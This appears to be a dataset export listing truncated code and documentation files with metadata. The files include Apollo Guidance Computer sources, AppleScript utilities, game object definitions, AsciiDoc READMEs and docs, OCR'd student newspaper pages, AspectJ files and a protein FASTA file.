Copyright: Public domain. -## Filename: DUMMY_206_INITIALIZATION.agc -## Purpose: A module for revision 0 of BURST120 (Sunburst). It -## is part of the source code for the Lunar Module's -## (LM) Apollo Guidance Computer (AGC) for Apollo 5. -## Assembler: yaYUL -## Contact: Ron Burkey . -## Website: www.ibiblio.org/apollo/index.html -## Mod history: 2016-09-30 RSB Created draft version. -## 2016-10-30 RSB Finished transcription. -## 2016-12-06 RSB Proofed comments with octopus/ProoferComments, -## changes were made. - -## Page 869 -# PROGRAM NAME - BEGIN206 -# MOD. NO. 3 -# MOD BY - D. LICKLY AND J. SAMPSON -# DATE - NOV. 22, 1966 -# LOG SECTION - DUMMY 206 INITIALIZATION -# ASSEMBLY - SUNBURST REVISION 36 - -# FUNCTIONAL DESCRIPTION - START UP TO TWO DELAYED JOBS OR TASKS AFTER SLAP1 FOR SIMULATION PURPOSES. - -# FIXED INITIALIZATION REQUIRED - PATCH STARTDT1 AND STARTDT2 TO REPRESENT THE TIME2,TIME1 VALUE AT THE TIME AT -# ","37","0.9736842105263158","0.0","0.0" -"0c7aa15123fb3bf3c6b5b11732f65950093186ed","DISPLAY_INTERFACE_ROUTINES.agc",".agc","Apollo Guidance Computer","# Copyright: Public domain. -# Filename: DISPLAY_INTERFACE_ROUTINES.agc -# Purpose: Part of the source code for Comanche, build 055. It -# is part of the source code for the Command Module's -# (CM) Apollo Guidance Computer (AGC), Apollo 11. -# Assembler: yaYUL -# Reference: pp. 1452-1484 -# Contact: Ron Burkey -# Website: http://www.ibiblio.org/apollo. -# Mod history: 2009-05-07 RSB Adapted from Colossus249 file of the same -# name, and page images. Corrected various -# typos in the transcription of program -# comments, and these should be back-ported -# to Colossus249. -# -# The contents of the ""Comanche055"" files, in general, are transcribed -# from scanned documents. -# -# Assemble revision 055 of AGC program Comanche by NASA -# 2021113-051. April 1, 1969. -# -# This AGC program shall also be referred to as Colossus 2A -# -# Prepared by -# Massachusetts Institute of Techn","37","0.9736842105263158","0.0","0.0" -"084f0a96f4e635429fa0bd78401ffb23e9c616f6","main.agc",".agc","Apollo Guidance Computer","// **************************************************************************************************************************************************************** -// **************************************************************************************************************************************************************** -// -// File: main.agc -// Purpose: Main program -// Date: 2nd August 2016 -// Author: Paul Robson (paul@robsons.org.uk) -// -// **************************************************************************************************************************************************************** -// **************************************************************************************************************************************************************** - -#include ""source\common.agc"" // Source files. -#include ""source\drawing.agc"" -#include ""source\manager.agc"" -#include ""source\song.agc"" -#include ""source\panel.agc"" -#include ""source\metronome.agc"" -#includ","37","0.9736842105263158","0.0","0.0" -"06b8ca3ed1fdd4b13cee7f997ee8ae476cf4efe9","FRESH_START_AND_RESTART.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" -## Copyright: Public domain. -## Filename: FRESH_START_AND_RESTART.agc -## Purpose: A section of Comanche revision 051. -## It is part of the reconstructed source code for the -## original release of the flight software for the Command -## Module's (CM) Apollo Guidance Computer (AGC) for Apollo 11. -## The code has been recreated from a copy of Comanche 055. It -## has been adapted such that the resulting bugger words -## exactly match those specified for Comanche 51 in NASA drawing -## 2021153D, which gives relatively high confidence that the -## reconstruction is correct. -## Reference: pp. 181-210 -## Assembler: yaYUL -## Contact: Ron Burkey . -## Website: www.ibiblio.org/apollo/index.html -## Mod history: 2019-07-30 MAS Created from Comanche 55. -## 2021-05-30 ABS 00 -> OO in various symbol names. -## ","37","0.9736842105263158","0.0","0.0" -"0a3869d194470b115b0d12a139751d00aee4ea08","daily-standup.applescript",".applescript","AppleScript","#!/usr/bin/osascript - -################################################################################ -# Tyme2 Daily Standup -# -# Read daily task items from Tyme2 application and print them to stdout for a -# morning report of the previous days activities. On Monday, this will scan for -# work accomplished over the weekend. -# -# This is intented to be run with `| pbcopy` so that the content is placed into -# the clipboard, but it could also be run quietly and piped to a text file. -# -# Author: Craig Davis -# License: MIT -# Copyright: Craig Davis 2016 -# -################################################################################ - - -########################################################################## -# Variables -########################################################################## - -# string Newline for formatting -set nl to "" -"" - -# string Program output -set standup to """" - -# string Name of day -set today to (weekday of (current date)) - -# integer Seconds since midnigh","70","0.17326732673267325","0.0","0.0" -"11831df038fb62b3ff455e5af0d723ab508ad09e","fmGUI_ObjectClick_CancelButton.applescript",".applescript","AppleScript","-- fmGUI_ObjectClick_CancelButton({buttonRef:null}) --- Erik Shagdar, NYHTC --- Wrapper method for clicking the cancel button and waiting for the window to close - - -(* -REQUIRES: - fmGUI_ObjectClick_Button - - -HISTORY: - 1.1 - 2017-10-20 ( eshagdar ): wrapper for fmGUI_ObjectClick_SignInButton. - 1.0 - 2017-09-07 ( eshagdar ): created -*) - - -on run - - fmGUI_ObjectClick_CancelButton({}) - -end run - --------------------- --- START OF CODE --------------------- - -on fmGUI_ObjectClick_CancelButton(prefs) - -- version 1.1 - - try - return fmGUI_ObjectClick_Button({buttonName:""Cancel""} & prefs) - on error errMsg number errNum - error ""Unable to fmGUI_ObjectClick_CancelButton - "" & errMsg number errNum - end try -end fmGUI_ObjectClick_CancelButton - --------------------- --- END OF CODE --------------------- - -on fmGUI_ObjectClick_Button(prefs) - tell application ""htcLib"" to fmGUI_ObjectClick_Button(prefs) -end fmGUI_ObjectClick_Button -","70","0.17326732673267325","0.0","0.0" -"111a9cac46e275a4a5b2feafdff1c8c2a8b83f4e","New-Snippet-From-Selection|Clipboard.applescript",".applescript","AppleScript","-- @ description --- 1 shortcut to create from selection of keyboard --- --- @params none --- @return none -tell application ""System Events"" - tell (first process whose frontmost is true) - if (menu item ""Copy"" of menu 1 of menu bar item ""Edit"" of menu bar 1) is enabled then - tell application ""Typinator"" to create from selection - else - tell application ""Typinator"" to create from clipboard - end if - end tell - return false -end tell -","70","0.17326732673267325","0.0","0.0" -"0c6bbe23cacd079155abee2a87c8f5e0dd803abf","Pushover to iPhone.applescript",".applescript","AppleScript","on handle_string(message) - do shell script ""~/Development/bash/commands/bin/pushover -m \"""" & message & ""\"" -t \""LaunchBar\"" -d \""iPhone\"""" -end handle_string -","70","0.17326732673267325","0.0","0.0" -"0defde9de5c95ae8725148a3fd922a54da10db58","doc-postgresql.applescript",".applescript","AppleScript","open location ""file:///Library/PostgreSQL/9.6/doc/postgresql/html/index.html"" -","70","0.17326732673267325","0.0","0.0" -"0bb2edd6751e3b252d754239e06b318554d6e4e9","202aed-0c9a-4578-bdd3-80d27b5ad3dd.scpt",".scpt","AppleScript","1358958648017:struct('lastvisit':createDateTime(2012,10,25,17,30,47,995,""Europe/London""),'hitcount':2,'timecreated':createDateTime(2012,10,25,17,30,47,995,""Europe/London""))","304","0.7524752475247525","0.0","0.0" -"09fa11da107d4d421f9109bfb828efdbf2d0c0c4","ba7ecb-4508-4d5b-a321-fd08b7e0b9b1.scpt",".scpt","AppleScript","1356346032143:struct('lastvisit':createDateTime(2012,9,25,11,47,12,142,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,9,25,11,46,29,123,""Europe/London""))","304","0.7524752475247525","0.0","0.0" -"01e7976171185cb12ce7b18b5f303c39a32b3fdb","c93bac-1cc4-40a5-a687-f62a6f78bc10.scpt",".scpt","AppleScript","1356442601304:struct('lastvisit':createDateTime(2012,9,26,14,36,41,263,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,9,26,14,35,56,208,""Europe/London""))","304","0.7524752475247525","0.0","0.0" -"1403fe4518a778c49bd41e3178e7a9eebe3bbe2c","e610a7-0f33-4a3a-be06-a1be3cc8d74b.scpt",".scpt","AppleScript","1355479295686:struct('lastvisit':createDateTime(2012,9,15,11,1,35,648,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,9,15,11,1,14,187,""Europe/London""))","304","0.7524752475247525","0.0","0.0" -"095b2312c9ee8a5e22a370ad44e60845dbcd71a5","323877-aa54-4a05-b39e-843b5e43f2f6.scpt",".scpt","AppleScript","1359080075223:struct('lastvisit':createDateTime(2012,10,27,3,14,35,207,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,10,27,3,14,28,509,""Europe/London""))","304","0.7524752475247525","0.0","0.0" -"08acd49e99bc38e59034aa74139746224061a95c","chair_bc_2.arc",".arc","Arc","Object chair_bc_2.1 -name chair -weight 50000 -face chair_bc_2.101 -value 1600 -material 16 -materialname satin covered wood -name_pl chairs -client_type 8002 -end - -Object chair_bc_2.2 -name chair -weight 50000 -face chair_bc_2.111 -value 1600 -material 16 -materialname satin covered wood -name_pl chairs -client_type 8002 -end - -Object chair_bc_2.3 -name chair -weight 50000 -face chair_bc_2.121 -value 1600 -material 16 -materialname satin covered wood -name_pl chairs -client_type 8002 -end - -Object chair_bc_2.4 -name chair -weight 50000 -face chair_bc_2.131 -value 1600 -material 16 -materialname satin covered wood -name_pl chairs -client_type 8002 -end -","70","0.875","0.0","0.0" -"01d11fd25910d93036c99827135294de7b4229ce","sorcerer_book.arc",".arc","Arc","Object sorcerer_book -name grimoire -name_pl grimoires -face sorcerer_book.111 -type 85 -skill literacy -material 1 -value 20 -weight 5000 -editable 2048 -magicmap brown -nrof 1 -client_type 1001 -randomitems sorcery_book -end -# -# Starting spellbooks for sorcerers. -# -Object sorcerer_book_l1 -name grimoire -name_pl grimoires -face sorcerer_book.111 -type 85 -skill literacy -material 1 -value 20 -weight 5000 -editable 2048 -magicmap brown -nrof 1 -client_type 1001 -randomitems sorcery_l1 -end -","70","0.875","0.0","0.0" -"011938fb6c64a59f49db05a46c86efb76d390bc1","barmaid.arc",".arc","Arc","Object barmaid -name barmaid -race human -type 80 -layer 6 -behavior 2 -direction 5 -wc_range 20 -is_female 1 -is_good 1 -terrain_flag 1 -weapon_speed 0.055 -corpse 1 -attack_weaponmagic 100 -face barmaid.131 -animation barmaid -is_animated 1 -anim_speed 4 -speed -0.047 -alive 1 -monster 1 -Wis 4 -see_invisible 1 -protect_impact 75 -protect_cleave 75 -protect_pierce 75 -protect_slash 75 -protect_magic 100 -no_pick 1 -reflect_missile 1 -reflect_spell 1 -Con 15 -exp 100 -hp -1 -maxhp 100 -Pow 3 -ac 12 -wc 6 -dam 100 -level 1 -weight 85000 -friendly 1 -unaggressive 1 -Str 25 -end -","70","0.875","0.0","0.0" -"0c85a76e49fb3144d3e571bbc20c664ed87ee997","jelly_blue.arc",".arc","Arc","Object jelly_blue -name blue jelly -race slime -randomitems mob_slime -is_neutral 1 -weight 13250 -exp 101 -wc_range 20 -speed -0.05 -weapon_speed 0.040 -attack_cold 75 -protect_poison 100 -protect_paralyze 100 -ac 10 -wc 2 -dam 60 -hp -1 -maxhp 60 -terrain_flag 1 -Wis 3 -can_see_in_dark 1 -face blue_jelly.111 -animation jelly_blue -is_animated 1 -anim_speed 4 -type 80 -layer 6 -direction 5 -corpse 1 -monster 1 -no_pick 1 -alive 1 -level 1 -end -","70","0.875","0.0","0.0" -"0831f0686a4e2c9b8c283b14bc751bbc7fe42fde","childf3.arc",".arc","Arc","Object childf3 -name child -race human -type 80 -layer 6 -behavior 10 -direction 5 -wc_range 20 -is_female 1 -is_good 1 -terrain_flag 65 -weapon_speed 0.038 -corpse 1 -attack_slash 80 -face childf3.131 -animation childf3 -is_animated 1 -anim_speed 4 -speed -0.047 -monster 1 -item_power 6 -no_pick 1 -exp 89 -hp -1 -maxhp 60 -ac 7 -wc 3 -dam 44 -level 1 -weight 46000 -faction npcs -int 15 -end -","70","0.875","0.0","0.0" -"0ee69faed7ca16ccfd0fe4f1acab1a2c44b86719","macrodef.adoc",".adoc","AsciiDoc"," -This page has moved. If your browser doesn't automatically redirect to its new location, click -link:../settings/macrodef.html[here]. - ","2677","0.7931851851851852","0.0","0.0" -"0a35ca025f8abc673f881443e5eac5e6f433c856","PublisingNotes.adoc",".adoc","AsciiDoc","== Publishing to Maven Central - -The released artifacts are published to Maven central via Sonatype repository, the details of how the priveleges were obtained is http://central.sonatype.org/pages/ossrh-guide.html[here] - -To release from your desktop first add the credentials related to Sonatype(ossrh) in a gradle.properties file in your ~/.gradle directory, -note that this should be totally private to your machine and should never be shared. - -[source] ----- -signing.keyId=GPG_KEY_ID -signing.password=GPG_PASSEORD -signing.secretKeyRingFile=Signing Key Ring.. - -ossrhUsername=user -ossrhPassword=password ----- - -If all of the above is cleanly set, the artifact can be published using the command: - -[source] ----- -./gradlew uploadArchives -./gradlew publishPlugins # for gradle plugins site.. ----- - -It takes about 10 mins before the artifacts are visible via maven and 2 hours before it is searchable. - - -== For versioned releases: - -* go https://oss.sonatype.org/#stagingRepositories[here] -* search for comgi","2677","0.7931851851851852","0.0","0.0" -"07fd12c3a4fd6b41ac01df74cbb49453c4ea7bb9","README.adoc",".adoc","AsciiDoc","= OptaWeb Vehicle Routing - -image:https://travis-ci.com/kiegroup/optaweb-vehicle-routing.svg?branch=master[ -""Build Status"", link=""https://travis-ci.com/kiegroup/optaweb-vehicle-routing""] - -Web application for solving the https://www.optaplanner.org/learn/useCases/vehicleRoutingProblem.html[Vehicle Routing Problem] -using https://www.optaplanner.org/[OptaPlanner]. - -== Running the Application - -First, clone this repository and `cd` into it. - -Frontend and backend are built and run independently. Open two terminal windows. - -== Run Frontend - -. Install `npm`. If you're on Fedora, you can do this by running: -+ -[source,shell] ----- -sudo dnf install npm ----- - -. Install dependencies: -+ -[source,shell] ----- -cd optaweb-vehicle-routing-frontend -npm install ----- - -. Run frontend: -+ -[source,shell] ----- -npm start ----- - -. Open http://localhost:3000/ - -[TIP] -.Prevent `npm start` from launching your default browser -==== -If you don't want `npm start` to open a new browser tab each time you run it, -export an envir","2677","0.7931851851851852","0.0","0.0" -"011d98714fcd6da96136ded67e9381492dc7413f","README.adoc",".adoc","AsciiDoc","= beer-garden.io - -The documentation for -https://github.com/beer-garden/beer-garden/[beer-garden] -project. Composed in AsciiDoc, styled by Bootstrap, baked with Awestruct and -published by Github Pages. - - -For instructions on how to install Awestruct and its dependencies, refer to -the section xref:install-awestruct[Install Awestruct] below. - -== Preview the site locally - -To preview the site locally, simply run the default rake build task: - - rake - -The default rake build task is +preview+, so you're effectively typing: - - rake preview - -the +preview+ task is just a short way of invoking Awestruct in development -mode directly: - - awestruct -d --source-dir source --output-dir public - -Now visit http://localhost:4242 to preview the site - -To rebuild the site from a clean state, pass the +--force+ flag to the +preview+ -task: - - rake preview[--force] - -You can pass any flag through to Awestruct using the syntax in the previous -command. - -If you just want to generate the site, run: - - rake gen - -=== Ad","2677","0.7931851851851852","0.0","0.0" -"09747b78ff6d160238b6e6b46205c8ee5e0db8fe","trap-bug1.sh.adoc",".adoc","AsciiDoc","trap-bug1.sh(1) -=============== -:compat-mode!: - -NAME ----- -trap-bug1.sh - a shell script - -SYNOPSIS --------- -Documentation automatically generated with `zshelldoc' - -FUNCTIONS ---------- - - set_dollar_question - -DETAILS -------- - -Script Body -~~~~~~~~~~~ - -Has 5 line(s). Calls functions: - - Script-Body - `-- set_dollar_question - -Uses feature(s): _trap_ - -set_dollar_question -~~~~~~~~~~~~~~~~~~~ - -____ - #!/bin/zsh -f - # Tests for $? not set properly inside trap DEBUG. -____ - -Has 1 line(s). Doesn't call other functions. - -Called by: - - Script-Body - -","2677","0.7931851851851852","0.0","0.0" -"0666c86bc529191e03e250b378be0a3895517ff0","samarium_gds36.19819.asc",".asc","AsciiDoc","USGS Digital Spectral Library splib06a -Clark and others 2007, USGS, Data Series 231. - -For further information on spectrsocopy, see: http://speclab.cr.usgs.gov - -ASCII Spectral Data file contents: -line 15 title -line 16 history -line 17 to end: 3-columns of data: - wavelength reflectance standard deviation - -(standard deviation of 0.000000 means not measured) -( -1.23e34 indicates a deleted number) ----------------------------------------------------- -Samarium Oxide GDS36 W5R4Naa_ RREF -copy of spd0300 r 3788 - -1.23e34 -1.23e34 -1.23e34 - -1.23e34 -1.23e34 -1.23e34 - -1.23e34 -1.23e34 -1.23e34 - -1.23e34 -1.23e34 -1.23e34 - -1.23e34 -1.23e34 -1.23e34 - -1.23e34 -1.23e34 -1.23e34 - -1.23e34 -1.23e34 -1.23e34 - -1.23e34 -1.23e34 -1.23e34 - -1.23e34 -1.23e34 -1.23e34 - -1.23e34 ","155","0.045925925925925926","0.0","0.0" -"0f49e805b14a56f689bb42045a543b4c52b0b5a0","README.asc",".asc","AsciiDoc","= Check for updates - - -This solution check for updates in a Debian/Ubuntu server and send an email if there are some updates. - - -== How to install the solution - -Clone the repo - -[source,] ----- -$ git clone https://github.com/amieiro/check-for-updates.git ----- - -Run the composer installation -[source,] ----- -$ cd check-for-updates -$ composer install ----- - -Create the configuration file -[source,] ----- -$ mv .env.example .env ----- - -Complete the configuration file (.env file) with your own information, using a text editor -[source,] ----- -# SMTP server -MAIL_HOST=smtp.example.com -# Enable or disable SMTP authentication -SMTP_AUTH=true -# SMTP username -MAIL_USERNAME=info@example.com -# SMTP password -MAIL_PASSWORD=examplePassword -# Enable TLS or SSL encryption -MAIL_ENCRYPTION=tls -# TCP port to connect to -MAIL_PORT=587 -# Mail from address -MAIL_FROM_ADDRESS = info@example.com -# Mail from name -MAIL_FROM_NAME = ""Server Updates"" -# Recipient mail -MAIL_TO_ADDRESS = info@example.com -# Server name where you will c","155","0.045925925925925926","0.0","0.0" -"1477477bf5a1090bca8d2c5108538637836dd07a","Skhorn.asc",".asc","AsciiDoc","= FEATURE: BrainQuest Riddle 30 - -[.step-list] -* Logged-in at http://www.bqbi.net/en/info[BrainQuest] -* To solve the challenge http://www.bqbi.net/en/riddles/30[Riddle 30] - -== Background: - -[.step-list] - -* *Given* an image - -=== Scenario: Name of the place - -[.step-list] -* *Given* the title: Was here, dan - -* *When* i look at the place, i realize it is related with a large plaza at the vatican city. - -* *Then* i got the solution -","155","0.045925925925925926","0.0","0.0" -"019ab8fa15de593a9d9aad43640262c9daecf6b5","pitt_31735062156488_OCR.asc",".asc","AsciiDoc"," - - - -voL_. 46.—No. 41 - -THE UNIVERSITY or PITTSBURGH - -FR_I., APRIL 24, 1953 - -S4000 High School Pupils Here - - . . 33/. win nmmvncnnnii -. g V’ - Singers,speakers, and instrumentalists will hold the cen- -‘ -ter of the Oakland stages for the remaining sessions of the - -Pennsylvania Forensic and Music League finals, todayand, -°.tomorrow. - - - Hill City Tour Ends - YWCA Program , - -_ By ELINDRE STONE -A tour on May 7 to Hill City, one of the Pittsburgh’s -7 unique organizations, will end this year’s jointly—sponsored -tours’ program of the University’s YW & YMCA. - - -Those on the tour will see Hill City in action, sitting -andés - - -eague Finals /7 - - Far Eastern - -pi Study Maj or - -Announced — - -Dr. James T. C. Liu has an- - -nounced that, after tvy__q_yea.rs«of- - -development, an’ interdepartment- -all major in Far Eastern Studies -.Will' be made available to Pitt stu- -dents. -- - -- The aim of ‘the program is to -train college graduates for imme- -diate public service. Placement of -graduates is assured fo","155","0.045925925925925926","0.0","0.0" -"06e5e9fc149037e0927558056d04f03a63595be8","pitt_31735062159029_OCR.asc",".asc","AsciiDoc","_ presidents last month, and the plan - -A-\.__ - -Headlines... - -Women’s Fraternities -Urged To Adopt -i Membership Regulation - - - -OFFICIAL STUDE - -he Pitt News - -NT T RI-WEEKLY PUBLICATION OF THE UNIVERSITY OF PITTSBURGH - -By MARION CONN - -Volume XXIX Z653 - -PITTSBURGH, PENNSYLVANIA, WEDNESDAY, JANUARY 12, 1938 - -K: - -Number 42 - - - -hi the last few weeks, a rein- -carnation oi’ an old plan to limit. -the niembersliip of womt-.11’s so- -cial t‘raternit.ies has appeared -on the Universit_v canipus. - -At: various intervals tl1rou;2:li- -out the past decade attempts have -been made to put the plan into ef- - -fect here, but all efforts have -failed’ consistently. Now the Na- -tional Panhellenic Congress is - -making its first official move in an -attempt to have their plan ap- -proved and adopted immediately -by women’s fraternities all over -the country. - -Letters explaining the reorgan- -ization were sent to fraternity - -has been presented and discussed -at meetings of the local chapters. - -Now the question is pending, -“W","155","0.045925925925925926","0.0","0.0" -"0ae0ff896584510b36fa79c5133dc6b312843794","type_system.asciidoc",".asciidoc","AsciiDoc","[[CH-TypeSystem]] -== The Erlang Type System and Tags - -One of the most important aspects of ERTS to understand is how ERTS -stores data, that is, how Erlang terms are stored in memory. This -gives you the basis for understanding how garbage collection works, -how message passing works, and gives you an insight into how much -memory is needed. - -In this chapter you will learn the basic data types of Erlang and -how they are implemented in ERTS. This knowledge will be essential -in understanding the chapter on memory allocation and garbage -collection, see xref:CH-Memory[]. - -=== The Erlang Type System - -Erlang is _strongly typed_. That is, there is no way to coerce one -type into another type, you can only convert from one type to another. -Compare this to e.g. C where you can coerce a _char_ to an _int_ or -any type pointed to by a pointer to (_void *_). - -The Erlang type lattice is quite flat, there are only a few real sub -types, numbers have the sub types integer and float, an","541","0.1602962962962963","0.0","0.0" -"0a9f98d6547ebeadc0f7f9d69035e993fb2acb71","charts-installing.asciidoc",".asciidoc","AsciiDoc","--- -title: Installing Vaadin Charts -order: 2 -layout: page ---- - -[[charts.installing]] -= Installing Vaadin Charts - -As with most Vaadin add-ons, you can install Vaadin Charts as a Maven or Ivy -dependency in your project, or from an installation package. For general -instructions on installing add-ons, please see -<>. - -Vaadin Charts 4 requires Vaadin 8. - -Using Vaadin Charts requires a license key, which you must install before -compiling the widget set. The widget set must be compiled after setting up the -dependency or library JARs. - -For instructions on installing a license key, see <>. - -[[charts.installing.maven]] -== Maven Dependency - -The Maven dependency for Vaadin Charts is as follows: - -[subs=""normal""] ----- -<dependency> - <groupId>com.vaadin</groupId> - <artifactId>va","541","0.1602962962962963","0.0","0.0" -"0f7d98afa6e4c5496cc0b9ed93b784f3d0895763","tophits-aggregation.asciidoc",".asciidoc","AsciiDoc","[[search-aggregations-metrics-top-hits-aggregation]] -=== Top hits Aggregation - -A `top_hits` metric aggregator keeps track of the most relevant document being aggregated. This aggregator is intended -to be used as a sub aggregator, so that the top matching documents can be aggregated per bucket. - -The `top_hits` aggregator can effectively be used to group result sets by certain fields via a bucket aggregator. -One or more bucket aggregators determines by which properties a result set get sliced into. - -==== Options - -* `from` - The offset from the first result you want to fetch. -* `size` - The maximum number of top matching hits to return per bucket. By default the top three matching hits are returned. -* `sort` - How the top matching hits should be sorted. By default the hits are sorted by the score of the main query. - -==== Supported per hit features - -The top_hits aggregation returns regular search hits, because of this many per hit features can be supported: - -* <> and <>. - -[discrete] -[[restore-snapshot-prereqs]] -=== Prerequisites - -include::register-repository.asciidoc[tag=kib-snapshot-prereqs] - -include::apis/restore-snapshot-api.asciidoc[tag=restore-prereqs] - -[discrete] -[[restore-snapshot-considerations]] -=== Considerati","541","0.1602962962962963","0.0","0.0" -"08cd8ca5324e3cfbca25f4d91946471660c1c119","linux-faq.txt",".txt","AsciiDoc","[[cha:linux-faq]] - -= Linux FAQ - -These are some basic Linux commands and techniques for new to Linux -users. More complete information can be found on the web or by using -the man pages. - -== Automatic Login - -When you install LabvCNC with the Ubuntu LiveCD the default is to have to -log in each time you turn the computer on. To enable automatic login go -to 'System > Administration > Login Window'. If it is a fresh install the -Login Window might take a second or three to pop up. You will have to -have your password that you used for the install to gain access to the -Login Window Preferences window. In the Security tab check off Enable -Automatic Login and pick a user name from the list (that would be you). - -== Automatic Startup - -To have LabvCNC start automatically with your config after turning on the -computer go to 'System > Preferences > Sessions > Startup Applications', -click Add. Browse to your config and select the .ini file. When the file -picker dialog closes, add labvcnc and a space in ","16","0.004740740740740741","0.0","0.0" -"12e7999a4ca6ca08341ea3af3e4e242379decae4","objfmt-macho32.txt",".txt","AsciiDoc","[[objfmt-macho32]] -== `macho32`: Mach 32-bit Object File Format - -indexterm:[`macho`,`macho32`] -indexterm:[Mach-O] -indexterm:[Mac OSX] - -// vim: set syntax=asciidoc sw=2 tw=70: -","16","0.004740740740740741","0.0","0.0" -"07a3fe72264ef935f8d0cf7946a872d91b121f4d","utlist.txt",".txt","AsciiDoc","utlist: linked list macros for C structures -=========================================== -Troy D. Hanson -v2.0.1, July 2016 - -Here's a link back to the https://github.com/troydhanson/uthash[GitHub project page]. - -Introduction ------------- -A set of general-purpose 'linked list' macros for C structures are included with -uthash in `utlist.h`. To use these macros in your own C program, just -copy `utlist.h` into your source directory and use it in your programs. - - #include ""utlist.h"" - -These macros support the basic linked list operations: adding and deleting -elements, sorting them and iterating over them. - -Download -~~~~~~~~ -To download the `utlist.h` header file, -follow the links on https://github.com/troydhanson/uthash to clone uthash or get a zip file, -then look in the src/ sub-directory. - -BSD licensed -~~~~~~~~~~~~ -This software is made available under the -link:license.html[revised BSD license]. -It is free and open source. - -Platforms -~~~~~~~~~ -The 'utlist' macros have bee","16","0.004740740740740741","0.0","0.0" -"159e6d2c1b5dff86ddfa3a665a7f3d05e6ca26d2","updateinfoxml2solv.txt",".txt","AsciiDoc","updateinfoxml2solv(1) -===================== -:man manual: LIBSOLV -:man source: libsolv - - -Name ----- -updateinfoxml2solv - convert rpm-md's updateinfo.xml format into a solv file - -Synopsis --------- -*updateinfoxml2solv* ['OPTIONS'] - -Description ------------ -The updateinfoxml2solv tool reads rpm-md's updateinfo xml data from stdin, -and writes it as solv file to standard output. Update elements are converted -into special *patch:* pseudo packages. - -See Also --------- -mergesolv(1), createrepo(8) - -Author ------- -Michael Schroeder - -//// -vim: syntax=asciidoc -//// -","16","0.004740740740740741","0.0","0.0" -"156a24066e24320554eb5b6badf2b652fa165b41","configure.txt",".txt","AsciiDoc","// -*- mode:doc; -*- -// vim: set syntax=asciidoc: - -[[configure]] -Details on Buildroot configuration ----------------------------------- - -All the configuration options in +make *config+ have a help text -providing details about the option. However, a number of topics -require additional details that cannot easily be covered in the help -text and are there covered in the following sections. - -Cross-compilation toolchain -~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -A compilation toolchain is the set of tools that allows you to compile -code for your system. It consists of a compiler (in our case, +gcc+), -binary utils like assembler and linker (in our case, +binutils+) and a -C standard library (for example -http://www.gnu.org/software/libc/libc.html[GNU Libc], -http://www.uclibc.org/[uClibc]). - -The system installed on your development station certainly already has -a compilation toolchain that you can use to compile an application -that runs on your system. If you're using a PC, your compilation -toolchain runs on a","16","0.004740740740740741","0.0","0.0" -"0c7ea15466e3b9f7b858ddb42341433287d89035","AlerteDocument_Roo_Jpa_ActiveRecord.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. -// You may push code into the target .java compilation unit if you wish to edit any member(s). - -package fr.sdis83.remocra.domain.remocra; - -import fr.sdis83.remocra.domain.remocra.AlerteDocument; -import java.util.List; -import javax.persistence.EntityManager; -import javax.persistence.PersistenceContext; -import org.springframework.transaction.annotation.Transactional; - -privileged aspect AlerteDocument_Roo_Jpa_ActiveRecord { - - @PersistenceContext - transient EntityManager AlerteDocument.entityManager; - - public static final List AlerteDocument.fieldNames4OrderClauseFilter = java.util.Arrays.asList(""id"", ""alerte"", ""document""); - - public static final EntityManager AlerteDocument.entityManager() { - EntityManager em = new AlerteDocument().entityManager; - if (em == null) throw new IllegalStateException(""Entity manager has not been injected (is the Spring Aspects JAR configured as an","421","1.0169082125603865","0.0","0.0" -"01b03ac21150ff075c5f503d9830fd89c997734a","ObjektiSeadusIntsidendi_Roo_Entity.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. -// You may push code into the target .java compilation unit if you wish to edit any member(s). - -package ee.itcollege.group04_2011.entities; - -import ee.itcollege.group04_2011.entities.ObjektiSeadusIntsidendi; -import java.lang.Integer; -import java.lang.Long; -import java.util.List; -import javax.persistence.Column; -import javax.persistence.EntityManager; -import javax.persistence.PersistenceContext; -import javax.persistence.Version; -import org.springframework.transaction.annotation.Transactional; - -privileged aspect ObjektiSeadusIntsidendi_Roo_Entity { - - @PersistenceContext - transient EntityManager ObjektiSeadusIntsidendi.entityManager; - - @Version - @Column(name = ""version"") - private Integer ObjektiSeadusIntsidendi.version; - - public Integer ObjektiSeadusIntsidendi.getVersion() { - return this.version; - } - - public void ObjektiSeadusIntsidendi.setVersion(Integer version) { - ","421","1.0169082125603865","0.0","0.0" -"0cd78d896fa45bf3c65b34b4ba6d9a039117c46f","uniprot_sprot.fasta.aj",".aj","AspectJ","EEIETSEIRPGRDLPVRKRRKICRSLGSHLASGGWNLSREQGNKLLASRFRGDCLYICNW -PGCIHVEEKRNYMLFRGVFKDFKRSRVWRTINDGNRSKTSGLKCAFCLCDETWDLHSSFC -LRRVFGFHDDGEPVVRAYVCENGHVSGAWTALPLYT ->sp|Q9Y6B2|EID1_HUMAN EP300-interacting inhibitor of differentiation 1 OS=Homo sapiens GN=EID1 PE=1 SV=1 -MSEMAELSELYEESSDLQMDVMPGEGDLPQMEVGSGSRELSLRPSRSGAQQLEEEGPMEE -EEAQPMAAPEGKRSLANGPNAGEQPGQVAGADFESEDEGEEFDDWEDDYDYPEEEQLSGA -GYRVSAALEEADKMFLRTREPALDGGFQMHYEKTPFDQLAFIEELFSLMVVNRLTEELGC -DEIIDRE ->sp|Q9DCR4|EID1_MOUSE EP300-interacting inhibitor of differentiation 1 OS=Mus musculus GN=Eid1 PE=1 SV=2 -MAEMAELCELYEESNELQMDVLPGEGYMEVGRGARGPAPEEGPMEEEAGPAAARAQRGLF -PEAGADLEGDEFDDWEDDYEFPEEERWSGAMHRVSAALEEANKVFLRTARAGDALDGGFQ -ARCEKSPFDQLAFIEELFSLMVVNRLTEELGCDEIIDRELMLTREEETT ->sp|Q5RDL6|EID1_PONAB EP300-interacting inhibitor of differentiation 1 OS=Pongo abelii GN=EID1 PE=2 SV=1 -MSEMAELSELYEESSDLQMDVMPGEGDLPQMEVGSGSRELSLRPSRNGAQPQLEEEGPME -EEEAQPMAAPEGKRSLASGPNAGEQPGQVAGADFESEDEGEEFDDWEDDYDYPEEEQLSG -AGYRVSAALEEADKMFLRTREPALDGGFQMHYEKTPFDQLA","421","1.0169082125603865","0.0","0.0" 